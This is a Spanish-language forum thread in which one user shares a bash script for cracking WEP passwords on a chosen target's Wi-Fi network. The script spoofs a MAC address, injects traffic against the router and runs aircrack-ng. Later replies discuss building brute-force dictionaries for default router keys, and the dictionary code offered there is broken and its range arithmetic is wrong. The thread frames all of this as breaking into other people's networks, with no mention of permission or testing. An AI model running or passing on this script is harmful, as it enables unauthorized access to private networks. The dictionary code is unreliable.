Script sencillo para hackear claves WEP funcionando.

Iniciado por SnakingMax, 10 Febrero 2010, 11:21 AM

0 Miembros y 3 Visitantes están viendo este tema.

SnakingMax

Acabo de realizar un script para Hackear las redes wireles como alternativa al airoscript o similares.
El mío es más sencillo, sin llamadas a métodos. Os lo dejo por aquí:

Código (bash) [Seleccionar]

#! /bin/bash
#Script wifihack por snakingmax.
sudo rm -r /tmp/wifihack/
sudo mkdir /tmp/wifihack/

# PASO 0 - ACTIVAR EL DRIVER MONITOR:
sudo airmon-ng stop mon0;
sudo airmon-ng start wlan0;

# PASO 0.1 - PONERME UNA MAC FALSA. Fabada mola xD
sudo ifconfig mon0 down;
sudo macchanger --mac=00:FA:BA:DA:CA:BE mon0
sudo ifconfig mon0 up;

# PASO 1 - LISTAR LAS WIFIS:
xterm -title "Detectando wifis (paralo cuando quieras)." -e sudo airodump-ng mon0 -w "/tmp/wifihack/wifiList";
cat /tmp/wifihack/wifiList-01.kismet.netxml | grep -e 'essid' -e 'BSSID'  -e 'channel' -e 'encryption' > /tmp/wifihack/wifis |
firefox "/tmp/wifihack/wifis";

# Un inciso para preguntar:
j="n";
while test $j != "s"
do
clear;
echo Dime el canal del punto de acceso:
read canal
echo Dime la mac del router del objetivo:
read MAC_OBJETIVO
echo Dime el nombre de la wifi del objetivo:
read NOMBRE_AP
echo "¿Estás seguro de que lo has escrito bien (s/n)?"
read j
done
echo Vamos a empezar con el proceso entonces.

# PASO 2 - PONER EL AIRODUMP:
xterm -hold  -title "Pinchando la conexión del objetivo" -e sudo airodump-ng -c $canal -w /tmp/wifihack/captura mon0 &

# PASO 3 - HACERSE AMIGO DEL ROUTER DEL OBJETIVO:
# e inyectar algo de tráfico cada 5 segundos.
xterm -hold -title "Me estoy haciendo amigo del router del objetivo" -e "for (( i=0; i<=1000; i++ )) do sudo aireplay-ng -1 0 -a $MAC_OBJETIVO -h 00:FA:BA:DA:CA:BE -e $NOMBRE_AP mon0; sleep 5; done" &

# PASO 4 - ESNIFAR ROUTER DEL OBJETIVO:
xterm -hold -title "Almacenando los datos de la conexion pinchada" -e sudo aireplay-ng -3 -b $MAC_OBJETIVO -h 00:FA:BA:DA:CA:BE mon0 &

# PASO 5 - OBTENER LA CLAVE A PARTIR DE LO QUE ESNIFAMOS:
xterm -hold -title "Pulsa una tecla para intentar crackear" -e "for (( i=0; i<=1000; i++ )) do read a; sudo aircrack-ng -a 1 -s /tmp/wifihack/captura-01.cap; done"


Solamente me gustaría que mostrase mejor el archivo: wifiList-01.kismet.netxml
Ese archivo contiene en formato xml la lista de wifis de todos los canales wifi.

Lo que hice es volcar a un archivo usando grep los datos mas interesantes de las wifis que se guardan en bloques que empiezan con el campo <encriptacion> y terminan con el campo <canal>.

Y después abro ese archivo con firefox, si no lo tenéis instalado podéis abrirlo con kate o similares.

Lo interesante sería que el script filtrase también las etiquetas de xml y mostrase los datos algo mas ordenados  :P

Un saludo y gracias a todos por vuestra ayuda.

cayo01

se nota que eres hacker jaja
oiee me puedes ayudar d un tema
el tema del deccionario tu sabes algun troco para crear un diccionario
quiero crear un deccionario con 13 digitos hex 0-9 A-F para los redes de wlanXXXXXX y las nuevas wlan_XX y jazztel_XX
y muchas gracias

SnakingMax

numDigitos = 13;
contUnidades = 0;
apuntador = 0;
i = "0000000000000";
while (( i -eq "FFFFFFFFFFFFFFF" )) do
if (test (contUnidadades = 15)&(numDigitos=13)) then
     contUnidades=0;
     numDigitos = 0;

     
     if (apuntador=13)
     #apuntar

cat i > diccionario.txt
done

SnakingMax

#3
Acabo de hacer el código en bash muy rápido y me falta la linea que actualiza la cadena seguro que van cosas mal pero la idea es la que te escribo aqui debajo. Busca un manual de bash.
Despues solo tendrias que concatenar cada linea a la cadena "WLAN":

Código (bash) [Seleccionar]

numDigitos = 13;
contUnidades = 0;
apuntador = 0;
i = "0000000000000";
#Vemos si llegó al final de nuestra cadena de caracteres.
while (( $i -ne "FFFFFFFFFFFFFFF" )) do
if (test ($contUnidades = 15)&($apuntador=13)) then
    contUnidades=0;
    apuntador = 0;
# Vemos si hay que pasar a un dígito de mayor peso
elif($contUnidades=15) then
   apuntador++;
fi;

#FALTA HACER ESTO AQUI->>>>Sumamos uno a la posicion i de nuestra cadena

#Almacenar
cat i > diccionario.txt
done


ChimoC me ha corregido un detalle y yo he corregido las variables que debían llevar $ delante, seguro que hay mas errores pero viendo por un tuto de bash scripting el código lo puedes terminar sin problemas, cualquier duda posteala por aqui pero googlea antes de preguntar.

Un saludo, espero que te sirva

Festor

Dos cosas:

-> Abusas demasiado del comando sudo... a decir verdad es preferible abrir una sesión "permanente" (hasta que cierres el script) con sudo -s en vez de llamar a cada rato a sudo....

->Para postear código bash o shell en el foro lo mejor es usar las etiquetas code así:

[code=bash]
#! /bin/bash
Pon aquí el código
[/code]

De forma que te quedaría así:

Código (bash) [Seleccionar]
#! /bin/bash
echo Hola mundo!

SnakingMax


cayo01

#6
he logrado a acer un script para generar estos diccionario, pero he tenido una problema aver se me puedes ayudar
mi cd es el wifislax 3.1
y formato del archivo d instalacion es ejemplo.c
ps he modificado unas cosas en jazzteldecrypter.c y me genera un diccionario 0000000000000 FFFFFFFFFFFFF pero mi problema es cuando lo pongo en funcion el archivo que genera llega a 2 gigas y se para y dice k no hay espacio
y lo estoi usando pa que lo guarda en disco duro que tiene 160 y puedo guardar muchos d estos archivos pero lo que se ve que tiene un limite de 2 gigas nha mas
aver s sabes algo pa mi problemia

Intrance


SnakingMax

#8
Pues lo que puedes hacer es en vez de 1 diccionario 4 distintos o los que sean y luego ya los unes desde fuera del CD. Así trabajas con menos de 2 gigas.

Me refiero a que puedes hacer varios bucles en tu script. Por ejemplo:
000.dic -> desde 000000000 hasta FFFFFFFFFFFFF/4
001.dic -> desde FFFFFFFFFFFFF/4 hasta FFFFFFFFFFFFF/2
002.dic -> desde FFFFFFFFFFFFF/2 hasta FFFFFFFFFFFFF/3
003.dic -> desde FFFFFFFFFFFFF/3 hasta FFFFFFFFFFFFF
Serían 4 partes de un diccionario gigante.
Si no tienes Linux instalado y el Cd no trabaja con mas de 2 gigas en windows desde la consola creo que con type puedes concatenarlos, sino con una version vieja del hacha de esas que no añadian porquería a las partes de los archivos.

Un saludo  ;)

cayo01

Cita de: SnakingMax en 16 Febrero 2010, 23:31 PM
Pues lo que puedes hacer es en vez de 1 diccionario 4 distintos o los que sean y luego ya los unes desde fuera del CD. Así trabajas con menos de 2 gigas.

Me refiero a que puedes hacer varios bucles en tu script. Por ejemplo:
000.dic -> desde 000000000 hasta FFFFFFFFFFFFF/4
001.dic -> desde FFFFFFFFFFFFF/4 hasta FFFFFFFFFFFFF/2
002.dic -> desde FFFFFFFFFFFFF/2 hasta FFFFFFFFFFFFF/3
003.dic -> desde FFFFFFFFFFFFF/3 hasta FFFFFFFFFFFFF
Serían 4 partes de un diccionario gigante.
Si no tienes Linux instalado y el Cd no trabaja con mas de 2 gigas en windows desde la consola creo que con type puedes concatenarlos, sino con una version vieja del hacha de esas que no añadian porquería a las partes de los archivos.

Un saludo  ;)
[/quo
esk nose que ago cn ese script
es para linux o windows???
el sistema k m interesa es en linux pake funciona cmo el wlandecrypter.c o jazzteldecrypter.c